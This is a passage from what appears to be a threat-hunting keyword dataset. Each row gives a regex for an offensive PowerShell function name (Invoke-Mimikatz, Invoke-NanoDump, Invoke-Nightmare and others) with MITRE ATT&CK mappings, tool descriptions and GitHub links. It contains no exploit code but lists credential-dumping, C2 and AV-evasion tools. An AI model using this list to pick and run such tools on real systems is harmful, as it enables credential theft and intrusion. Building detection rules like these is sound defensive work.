Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-MalSCCM*",".{0,1000}Invoke\-MalSCCM.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-MalSCCM*",".{0,1000}Invoke\-MalSCCM.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-MapDomainTrust*",".{0,1000}Invoke\-MapDomainTrust.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Merlin.ps1*",".{0,1000}Invoke\-Merlin\.ps1.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Invoke-MetaTwin*",".{0,1000}Invoke\-MetaTwin.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*InvokeMeter.bat*",".{0,1000}InvokeMeter\.bat.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Invoke-MFASweep*",".{0,1000}Invoke\-MFASweep.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1192","164","2024-01-31T22:52:58Z","2020-09-22T16:25:03Z" 
"*Invoke-MimiDoggies*",".{0,1000}Invoke\-MimiDoggies.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*Invoke-Mimidogz*",".{0,1000}Invoke\-Mimidogz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*Invoke-Mimidogz.ps1*",".{0,1000}Invoke\-Mimidogz\.ps1.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","37","9","2024-04-18T14:28:21Z","2020-09-22T16:47:19Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*Invoke-Mimikatz.json*",".{0,1000}Invoke\-Mimikatz\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking 
programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controller running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","37","9","2024-04-18T14:28:21Z","2020-09-22T16:47:19Z" "*Invoke-Mimikatz-old*",".{0,1000}Invoke\-Mimikatz\-old.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Invoke-MimikatzWDigestDowngrade*",".{0,1000}Invoke\-MimikatzWDigestDowngrade.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Mimikittenz*",".{0,1000}Invoke\-Mimikittenz.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-MITM6*",".{0,1000}Invoke\-MITM6.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-ModifiableProgramsCheck*",".{0,1000}Invoke\-ModifiableProgramsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Mongoose*",".{0,1000}Invoke\-Mongoose.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-MonitorCredSniper*",".{0,1000}Invoke\-MonitorCredSniper.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). 
It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-MS16*",".{0,1000}Invoke\-MS16.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-MS16032*",".{0,1000}Invoke\-MS16032.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16032.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-MS16032*",".{0,1000}Invoke\-MS16032.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1126","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-MS16135*",".{0,1000}Invoke\-MS16135.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-MS16135.ps1*",".{0,1000}Invoke\-MS16135\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1120","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-MSSQLup*",".{0,1000}Invoke\-MSSQLup.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-NamedPipePermissionsCheck*",".{0,1000}Invoke\-NamedPipePermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-NanoDump*",".{0,1000}Invoke\-NanoDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-NanoDump*",".{0,1000}Invoke\-NanoDump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-NETMongoose*",".{0,1000}Invoke\-NETMongoose.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-NetRipper*",".{0,1000}Invoke\-NetRipper.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-NetworkAdaptersCheck*",".{0,1000}Invoke\-NetworkAdaptersCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-NetworkRelay*",".{0,1000}Invoke\-NetworkRelay.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-NetworkRelay.ps1*",".{0,1000}Invoke\-NetworkRelay\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Nightmare -DLL *",".{0,1000}Invoke\-Nightmare\s\-DLL\s.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-Nightmare -NewUser*",".{0,1000}Invoke\-Nightmare\s\-NewUser.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-Nightmare*",".{0,1000}Invoke\-Nightmare.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
